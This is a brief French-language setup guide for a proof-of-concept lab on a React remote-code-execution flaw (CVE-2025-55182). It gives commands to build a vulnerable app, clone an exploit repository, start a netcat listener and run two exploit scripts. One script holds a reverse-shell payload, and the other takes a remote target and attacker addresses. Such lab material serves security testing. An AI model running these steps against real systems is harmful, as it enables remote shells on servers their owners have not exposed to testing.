
POC et configuration de laboratoire
POC et configuration du laboratoire
npm create [email protected] react2shell-lab
Accepter les valeurs par défaut est correct, nommez-le comme vous voulez
git clone https://github.com/timsonner/React2Shell-CVE-2025-55182.git
npm install
cd react2shell-lab
npm run dev
nc -nlvp 4444
python3 react2shell-exploit-1.py
Cet exploit est bon pour tester la configuration localhost. Décommentez l'autre payload pour un reverse shell...
python3 react2shell-exploit-2.py
Cette version demande la saisie utilisateur pour la cible distante et les IPs et ports de l'attaquant. Le corps de la requête (body_parts) est également légèrement réduit dans cette version.